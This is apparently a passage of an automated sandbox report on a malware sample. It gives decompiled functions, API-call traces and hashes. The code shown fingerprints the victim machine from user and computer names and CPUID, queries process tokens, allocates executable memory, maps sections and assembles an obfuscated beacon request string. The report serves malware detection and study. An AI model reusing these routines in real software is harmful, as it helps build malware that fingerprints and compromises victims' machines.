						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}

0x01008978
0x0100897e
0x01008980
0x0100899a
0x0100899c
0x010089a1
0x01008c16
0x01008c1d
0x01008c1d
0x010089a7
0x010089bc
0x010089be
0x010089c0
0x010089c5
0x01008c06
0x01008c10
0x00000000
0x01008c10
0x010089cb
0x010089d6
0x010089db
0x010089e0
0x010089e3
0x010089ea
0x010089ef
0x010089f4
0x01008bf6
0x01008c00
0x00000000
0x01008c00
0x01008a0a
0x01008a0e
0x01008a11
0x01008a14
0x01008a1a
0x01008a1f
0x01008a28
0x01008a2e
0x01008a38
0x01008a3f
0x01008a3f
0x01008a51
0x01008a5c
0x01008a6a
0x01008a6f
0x01008a74
0x01008a77
0x01008a7c
0x01008a86
0x01008a89
0x01008a8c
0x01008aa2
0x01008aa4
0x01008aa9
0x01008bf4
0x00000000
0x01008bf4
0x01008ac0
0x01008b11
0x01008ad4
0x01008adc
0x01008ae1
0x01008aef
0x01008af8
0x01008b01
0x01008b01
0x01008b0f
0x01008b0f
0x01008b15
0x01008b19
0x01008b19
0x01008b1f
0x00000000
0x00000000
0x01008b21
0x01008b27
0x01008bce
0x01008bd1
0x01008bde
0x01008bde
0x01008be2
0x00000000
0x00000000
0x01008bd7
0x01008bdb
0x01008bdb
0x01008bdd
0x01008bdd
0x01008be7
0x01008bee
0x01008bf0
0x00000000
0x01008bf0
0x01008b2d
0x01008b2f
0x01008b2f
0x01008b42
0x01008b48
0x01008b53
0x01008b55
0x01008b59
0x01008b5b
0x01008b5b
0x01008b60
0x01008b62
0x01008b62
0x01008b60
0x01008b67
0x01008b6b
0x01008b6b
0x01008b7b
0x01008b80
0x01008b83
0x01008b83
0x01008b86
0x01008b90
0x01008b98
0x01008b9d
0x01008bab
0x01008bab
0x01008bbf
0x01008bc3
0x01008bc3

APIs

RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 0100899A
RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 010089BC
memset.NTDLL ref: 010089D6

Part of subcall function 010093FD: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,0100197C,63699BCE,010089EF,73797325), ref: 0100940E
Part of subcall function 010093FD: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 01009428

CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 01008A14
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 01008A28
FindCloseChangeNotification.KERNELBASE(00000000), ref: 01008A3F
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 01008A4B
lstrcat.KERNEL32(?,642E2A5C), ref: 01008A8C
FindFirstFileA.KERNELBASE(?,?), ref: 01008AA2
CompareFileTime.KERNEL32(?,?), ref: 01008AC0
FindNextFileA.KERNELBASE(01008880,?), ref: 01008AD4
FindClose.KERNEL32(01008880), ref: 01008AE1
FindFirstFileA.KERNEL32(?,?), ref: 01008AED
CompareFileTime.KERNEL32(?,?), ref: 01008B0F
StrChrA.SHLWAPI(?,0000002E), ref: 01008B42
memcpy.NTDLL(00000000,?,00000000), ref: 01008B7B
FindNextFileA.KERNELBASE(01008880,?), ref: 01008B90
FindClose.KERNEL32(01008880), ref: 01008B9D
FindFirstFileA.KERNEL32(?,?), ref: 01008BA9
CompareFileTime.KERNEL32(?,?), ref: 01008BB9
FindClose.KERNELBASE(01008880), ref: 01008BEE
HeapFree.KERNEL32(00000000,00000000,73797325), ref: 01008C00
HeapFree.KERNEL32(00000000,?), ref: 01008C10

Strings

Uxt, xrefs: 01008C00, 01008C10

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
String ID: Uxt
API String ID: 2944988578-1536154274
Opcode ID: 182d5bd52c9398b75929c8a725e8bb16b642a132fe34ab1f1c50f18dabaae0ae
Instruction ID: 16b053df00331e6c077a2921310afc8265a776f644a5b0e2d6d99dc56388b260
Opcode Fuzzy Hash: 182d5bd52c9398b75929c8a725e8bb16b642a132fe34ab1f1c50f18dabaae0ae
Instruction Fuzzy Hash: 2F815EB1D00219AFEB22DFA8DC44EEEBBB9FF45300F1041A6E585E6190E7759A44CF60

Uniqueness

Uniqueness Score: -1.00%

Function 01007EC1, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E01007EC1(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x100d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E01007D4B( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x100d2a0 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x100d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E0100A28E(_v8 + _v8, _t64);
							}
							HeapFree( *0x100d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x100d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E0100A28E(_v8 + _v8, _t64);
						}
						HeapFree( *0x100d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x01007ec1
0x01007ec9
0x01007ecd
0x01007ed0
0x01007ed5
0x01007ed7
0x01007edc
0x01007edc
0x01007ee2
0x01007ee4
0x01007ef1
0x01007f52
0x01007ef3
0x01007ef8
0x01007efe
0x01007f03
0x01007f11
0x01007f15
0x01007f24
0x01007f2b
0x01007f32
0x01007f32
0x01007f3d
0x01007f3d
0x01007f15
0x01007f03
0x01007f54
0x01007f5a
0x01007f64
0x01007f66
0x01007f6b
0x01007f7a
0x01007f7e
0x01007f89
0x01007f90
0x01007f97
0x01007f97
0x01007fa3
0x01007fa3
0x01007f7e
0x01007fae
0x01007fb0
0x01007fb3
0x01007fb5
0x01007fb8
0x01007fbb
0x01007fc5
0x01007fc9
0x01007fcd

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 01007EF8
RtlAllocateHeap.NTDLL(00000000,?), ref: 01007F0F
GetUserNameW.ADVAPI32(00000000,?), ref: 01007F1C
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,0100196C), ref: 01007F3D
GetComputerNameW.KERNEL32(00000000,00000000), ref: 01007F64
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 01007F78
GetComputerNameW.KERNEL32(00000000,00000000), ref: 01007F85
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,0100196C), ref: 01007FA3

Strings

Uxt, xrefs: 01007F3D, 01007FA3

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID: Uxt
API String ID: 3239747167-1536154274
Opcode ID: 85331e6e45c02ff92eae2a6b6421833d2305280e0b01d11e332961f7c70b8a6f
Instruction ID: 9af90e9a71f165d97f7e070e0cb17a85579e72cebf669029905847d3bbf6aa64
Opcode Fuzzy Hash: 85331e6e45c02ff92eae2a6b6421833d2305280e0b01d11e332961f7c70b8a6f
Instruction Fuzzy Hash: 46313B71A00205EFEB22DFA8C980A7EF7F9EF54310F2140A9E585D7254D739EE019B20

Uniqueness

Uniqueness Score: -1.00%

Function 6E181302, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000078E,00003000,00000040,0000078E,6E180D58), ref: 6E1813BF
VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040,6E180DBB), ref: 6E1813F6
VirtualAlloc.KERNEL32(00000000,00012AF2,00003000,00000040), ref: 6E181456
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E18148C
VirtualProtect.KERNEL32(6E100000,00000000,00000004,6E1812E1), ref: 6E181591
VirtualProtect.KERNEL32(6E100000,00001000,00000004,6E1812E1), ref: 6E1815B8
VirtualProtect.KERNEL32(00000000,?,00000002,6E1812E1), ref: 6E181685
VirtualProtect.KERNEL32(00000000,?,00000002,6E1812E1,?), ref: 6E1816DB
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E1816F7

Memory Dump Source

Source File: 00000003.00000002.598121845.000000006E180000.00000040.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 0f1f7b1b122eb33c6e72d88d935c3aa26e3bd9edeaa12e4efc1022abb1e4d76f
Instruction ID: b0ab8fad65fa23a30eac56dcbf37098ac8e8452b4087f23bf727b8370fc71a6f
Opcode Fuzzy Hash: 0f1f7b1b122eb33c6e72d88d935c3aa26e3bd9edeaa12e4efc1022abb1e4d76f
Instruction Fuzzy Hash: 07D17676208A089FDB51CF4EC8C0B5277A6FF8C320B290595ED1A9F65AD730B840DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 01001724, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E01001724(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E010098E4(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E01005DE8(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x01001731
0x01001732
0x01001733
0x01001734
0x01001735
0x01001739
0x01001740
0x0100174f
0x01001752
0x01001755
0x0100175c
0x0100175f
0x01001762
0x01001765
0x01001768
0x01001773
0x01001775
0x0100177e
0x01001786
0x01001788
0x0100179a
0x010017a4
0x010017a8
0x010017b7
0x010017bb
0x010017c4
0x010017cc
0x010017cc
0x010017ce
0x010017ce
0x010017d6
0x010017dc
0x010017e0
0x010017e0
0x010017eb

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 0100176B
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 0100177E
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 0100179A

Part of subcall function 010098E4: RtlAllocateHeap.NTDLL(00000000,00000000,01006788), ref: 010098F0

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 010017B7
memcpy.NTDLL(00000000,00000000,0000001C), ref: 010017C4
NtClose.NTDLL(?), ref: 010017D6
NtClose.NTDLL(00000000), ref: 010017E0

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 71940b6e6927629af43770d3d3855ae396607a748ae6d711d82a8e355ceb44e5
Instruction ID: 7ba35850b67ee34f56b936091afd7b475c43ff014413cccfcf4900a0248d6990
Opcode Fuzzy Hash: 71940b6e6927629af43770d3d3855ae396607a748ae6d711d82a8e355ceb44e5
Instruction Fuzzy Hash: AF211971900119BBEB12AF95CD85ADEBFBDFF18750F104166F644A6150D7B28A409BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E10145E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E10145E(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E6E10101B(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x6e101467
0x6e10146e
0x6e10146f
0x6e101470
0x6e101471
0x6e101472
0x6e101483
0x6e101487
0x6e10149b
0x6e10149e
0x6e1014a1
0x6e1014a8
0x6e1014ab
0x6e1014b2
0x6e1014b5
0x6e1014b8
0x6e1014bb
0x6e1014c0
0x6e1014fb
0x6e1014c2
0x6e1014c5
0x6e1014cb
0x6e1014d0
0x6e1014d4
0x6e1014f2
0x6e1014d6
0x6e1014dd
0x6e1014eb
0x6e1014eb
0x6e1014d4
0x6e101503

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,?), ref: 6E1014BB

Part of subcall function 6E10101B: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E1014D0,00000002,00000000,?,?,00000000,?,?,6E1014D0,00000002), ref: 6E101048

memset.NTDLL ref: 6E1014DD

Strings

@, xrefs: 6E1014AB

Memory Dump Source

Source File: 00000003.00000002.597496748.000000006E101000.00000020.00020000.sdmp, Offset: 6E100000, based on PE: true

Associated: 00000003.00000002.597478453.000000006E100000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.597518069.000000006E103000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.597561298.000000006E105000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.597576347.000000006E106000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: a4bb7986d80d4062f7d0166ba0705add4a49f6f95bba2aaeadc335ae39e1f72b
Instruction ID: de8fd6900d5c39e98394316b82e6854d78bd65ce762061ae92ff78fc0f7afe5f
Opcode Fuzzy Hash: a4bb7986d80d4062f7d0166ba0705add4a49f6f95bba2aaeadc335ae39e1f72b
Instruction Fuzzy Hash: 5C210BB1E00209AFDB11CFE9C8849DEFBB9EB48354F108429E645F3210DB359A499B60

Uniqueness

Uniqueness Score: -1.00%

Function 6E10101B, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6E10101B(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x6e10102d
0x6e101033
0x6e101041
0x6e101048
0x6e10104d
0x6e101053
0x00000000
0x6e101054
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E1014D0,00000002,00000000,?,?,00000000,?,?,6E1014D0,00000002), ref: 6E101048

Memory Dump Source

Source File: 00000003.00000002.597496748.000000006E101000.00000020.00020000.sdmp, Offset: 6E100000, based on PE: true

Associated: 00000003.00000002.597478453.000000006E100000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.597518069.000000006E103000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.597561298.000000006E105000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.597576347.000000006E106000.00000002.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: dfbaccba84e81765bb8daccf7239836ba79fedce5748ccfdf23b354f762916f2
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 60F012B590020CBFEB119FA5CC85C9FBBBDEB44394B104939F152E1094D6349E489A60

Uniqueness

Uniqueness Score: -1.00%

Function 01009DB0, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 245
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E01009DB0(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t101;
				signed int _t105;
				char** _t107;
				int _t110;
				signed int _t112;
				intOrPtr* _t113;
				intOrPtr* _t115;
				intOrPtr* _t117;
				intOrPtr* _t119;
				intOrPtr _t122;
				intOrPtr _t127;
				int _t131;
				CHAR* _t133;
				intOrPtr _t134;
				void* _t135;
				void* _t144;
				int _t145;
				void* _t146;
				intOrPtr _t147;
				void* _t149;
				long _t153;
				intOrPtr* _t154;
				intOrPtr* _t155;
				intOrPtr* _t158;
				void* _t159;
				void* _t161;

				_t144 = __edx;
				_t135 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x100d018; // 0x258be91c
				asm("bswap eax");
				_t61 =  *0x100d014; // 0x3a87c8cd
				_t133 = _a16;
				asm("bswap eax");
				_t62 =  *0x100d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x100d00c; // 0x13d015ef
				asm("bswap eax");
				_t64 =  *0x100d2a4; // 0x460a5a8
				_t3 = _t64 + 0x100e633; // 0x74666f73
				_t145 = wsprintfA(_t133, _t3, 3, 0x3d153, _t63, _t62, _t61, _t60,  *0x100d02c,  *0x100d004, _t59);
				_t67 = E0100A358();
				_t68 =  *0x100d2a4; // 0x460a5a8
				_t4 = _t68 + 0x100e673; // 0x74707526
				_t71 = wsprintfA(_t145 + _t133, _t4, _t67);
				_t161 = _t159 + 0x38;
				_t146 = _t145 + _t71; // executed
				_t72 = E01005369(_t135);
				_t134 = __imp__; // 0x74785520
				_v8 = _t72;
				if(_t72 != 0) {
					_t127 =  *0x100d2a4; // 0x460a5a8
					_t7 = _t127 + 0x100e8eb; // 0x736e6426
					_t131 = wsprintfA(_a16 + _t146, _t7, _t72);
					_t161 = _t161 + 0xc;
					_t146 = _t146 + _t131;
					HeapFree( *0x100d238, 0, _v8);
				}
				_t73 = E0100A0B7();
				_v8 = _t73;
				if(_t73 != 0) {
					_t122 =  *0x100d2a4; // 0x460a5a8
					_t11 = _t122 + 0x100e8f3; // 0x6f687726
					wsprintfA(_t146 + _a16, _t11, _t73);
					_t161 = _t161 + 0xc;
					HeapFree( *0x100d238, 0, _v8);
				}
				_t147 =  *0x100d32c; // 0x56195b0
				_t75 = E01003802(0x100d00a, _t147 + 4);
				_t153 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					RtlFreeHeap( *0x100d238, _t153, _a16); // executed
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x100d238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x100d238, _t153, _v20);
						goto L26;
					}
					E010010BF(GetTickCount());
					_t82 =  *0x100d32c; // 0x56195b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x100d32c; // 0x56195b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x100d32c; // 0x56195b0
					_t149 = E010061B9(1, _t144, _a16,  *_t88);
					_v28 = _t149;
					asm("lock xadd [eax], ecx");
					if(_t149 == 0) {
						L24:
						RtlFreeHeap( *0x100d238, _t153, _v8); // executed
						goto L25;
					}
					StrTrimA(_t149, 0x100c2ac);
					_push(_t149);
					_t94 = E0100A755();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						RtlFreeHeap( *0x100d238, _t153, _t149); // executed
						goto L24;
					}
					_t154 = __imp__;
					 *_t154(_t149, _a4);
					 *_t154(_v8, _v20);
					_t155 = __imp__;
					 *_t155(_v8, _v16);
					 *_t155(_v8, _t149);
					_t101 = E01008ECC(0, _v8);
					_a4 = _t101;
					if(_t101 == 0) {
						_v12 = 8;
						L21:
						E010014EF();
						L22:
						HeapFree( *0x100d238, 0, _v16);
						_t153 = 0;
						goto L23;
					}
					_t105 = E0100A617(_t134, 0xffffffffffffffff, _t149,  &_v24); // executed
					_v12 = _t105;
					if(_t105 == 0) {
						_t158 = _v24;
						_t112 = E01001A34(_t158, _a4, _a8, _a12); // executed
						_v12 = _t112;
						_t113 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t113 + 0x80))(_t113);
						_t115 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t115 + 8))(_t115);
						_t117 =  *((intOrPtr*)(_t158 + 4));
						 *((intOrPtr*)( *_t117 + 8))(_t117);
						_t119 =  *_t158;
						 *((intOrPtr*)( *_t119 + 8))(_t119);
						E01005DE8(_t158);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t107 = _a8;
							if(_t107 != 0) {
								_t150 =  *_t107;
								_t156 =  *_a12;
								wcstombs( *_t107,  *_t107,  *_a12);
								_t110 = E01004C8F(_t150, _t150, _t156 >> 1);
								_t149 = _v28;
								 *_a12 = _t110;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E01005DE8(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}

0x01009db0
0x01009db0
0x01009db0
0x01009db9
0x01009dc2
0x01009dc4
0x01009dc4
0x01009dd1
0x01009ddc
0x01009ddf
0x01009de4
0x01009ded
0x01009df0
0x01009df5
0x01009df8
0x01009dfd
0x01009e00
0x01009e0c
0x01009e19
0x01009e1b
0x01009e21
0x01009e26
0x01009e31
0x01009e33
0x01009e36
0x01009e38
0x01009e3d
0x01009e43
0x01009e48
0x01009e4b
0x01009e50
0x01009e5d
0x01009e5f
0x01009e65
0x01009e6f
0x01009e6f
0x01009e71
0x01009e76
0x01009e7b
0x01009e7e
0x01009e83
0x01009e90
0x01009e92
0x01009ea0
0x01009ea0
0x01009ea2
0x01009eb0
0x01009eb5
0x01009eb7
0x01009ebc
0x0100a07f
0x0100a089
0x0100a092
0x01009ec2
0x01009ece
0x01009ed4
0x01009ed9
0x0100a073
0x0100a07d
0x00000000
0x0100a07d
0x01009ee5
0x01009eea
0x01009ef3
0x01009f04
0x01009f08
0x01009f11
0x01009f17
0x01009f26
0x01009f2d
0x01009f36
0x01009f3c
0x0100a067
0x0100a071
0x00000000
0x0100a071
0x01009f48
0x01009f4e
0x01009f4f
0x01009f54
0x01009f59
0x0100a05d
0x0100a065
0x00000000
0x0100a065
0x01009f62
0x01009f69
0x01009f71
0x01009f76
0x01009f7f
0x01009f85
0x01009f8c
0x01009f91
0x01009f96
0x0100a095
0x0100a049
0x0100a049
0x0100a04e
0x0100a059
0x0100a05b
0x00000000
0x0100a05b
0x01009fa0
0x01009fa5
0x01009faa
0x01009faf
0x01009fba
0x01009fbf
0x01009fc2
0x01009fc8
0x01009fce
0x01009fd4
0x01009fd7
0x01009fdd
0x01009fe0
0x01009fe5
0x01009fe9
0x01009fe9
0x01009ff5
0x0100a001
0x0100a005
0x0100a007
0x0100a00c
0x0100a00e
0x0100a013
0x0100a018
0x0100a025
0x0100a02d
0x0100a030
0x0100a030
0x0100a00c
0x00000000
0x01009ff7
0x01009ffb
0x0100a032
0x0100a035
0x0100a03e
0x00000000
0x00000000
0x00000000
0x00000000
0x0100a03e
0x01009ffd
0x00000000
0x01009ffd
0x01009ff5

APIs

GetTickCount.KERNEL32 ref: 01009DC4
wsprintfA.USER32 ref: 01009E14
wsprintfA.USER32 ref: 01009E31
wsprintfA.USER32 ref: 01009E5D
HeapFree.KERNEL32(00000000,?), ref: 01009E6F
wsprintfA.USER32 ref: 01009E90
HeapFree.KERNEL32(00000000,?), ref: 01009EA0
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01009ECE
GetTickCount.KERNEL32 ref: 01009EDF
RtlEnterCriticalSection.NTDLL(05619570), ref: 01009EF3
RtlLeaveCriticalSection.NTDLL(05619570), ref: 01009F11

Part of subcall function 010061B9: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,01006028,?,056195B0), ref: 010061E4
Part of subcall function 010061B9: lstrlen.KERNEL32(?,?,?,01006028,?,056195B0), ref: 010061EC
Part of subcall function 010061B9: strcpy.NTDLL ref: 01006203
Part of subcall function 010061B9: lstrcat.KERNEL32(00000000,?), ref: 0100620E
Part of subcall function 010061B9: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,01006028,?,056195B0), ref: 0100622B

StrTrimA.SHLWAPI(00000000,0100C2AC,?,056195B0), ref: 01009F48

Part of subcall function 0100A755: lstrlen.KERNEL32(05619908,00000000,00000000,770CC740,01006053,00000000), ref: 0100A765
Part of subcall function 0100A755: lstrlen.KERNEL32(?), ref: 0100A76D
Part of subcall function 0100A755: lstrcpy.KERNEL32(00000000,05619908), ref: 0100A781
Part of subcall function 0100A755: lstrcat.KERNEL32(00000000,?), ref: 0100A78C

lstrcpy.KERNEL32(00000000,?), ref: 01009F69
lstrcpy.KERNEL32(?,?), ref: 01009F71
lstrcat.KERNEL32(?,?), ref: 01009F7F
lstrcat.KERNEL32(?,00000000), ref: 01009F85

Part of subcall function 01008ECC: lstrlen.KERNEL32(?,00000000,0100D330,00000001,0100577D,0100D00C,0100D00C,00000000,00000005,00000000,00000000,?,?,?,01008880,0100197C), ref: 01008ED5
Part of subcall function 01008ECC: mbstowcs.NTDLL ref: 01008EFC
Part of subcall function 01008ECC: memset.NTDLL ref: 01008F0E

wcstombs.NTDLL ref: 0100A018

Part of subcall function 01001A34: SysAllocString.OLEAUT32(?), ref: 01001A6F
Part of subcall function 01001A34: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 01001AF2

